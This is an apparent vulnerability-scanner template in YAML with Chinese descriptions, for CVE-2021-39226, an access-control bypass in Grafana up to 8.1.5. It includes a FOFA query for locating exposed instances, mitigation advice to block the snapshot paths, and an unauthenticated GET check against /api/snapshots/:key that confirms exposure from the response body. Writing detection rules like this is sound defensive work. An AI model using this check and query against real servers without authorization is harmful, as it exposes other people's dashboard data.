product: Grafana
vName: Grafana 身份权限绕过
type: 访问控制
vID:
  - CVE-2021-39226
level: 2
vDesc: Grafana 是一个开源数据可视化平台。在受影响的版本中，未经身份验证和经过身份验证的用户都可以通过访问路径查看具有最低数据库密钥的快照。
version: <= 8.1.5
note: ''
search:
  FOFA: app="Grafana"
protocol: http
link: https://github.com/grafana/grafana/security/advisories/GHSA-69j6-29vr-p3j9
fix:
  - 您可以使用反向代理或类似方法阻止对路径的访问
  - /api/snapshots/:key
  - /api/snapshots-delete/:deleteKey
  - /dashboard/snapshot/:key
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /api/snapshots/:key
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - isSnapshot
              - dashboard
            logic: and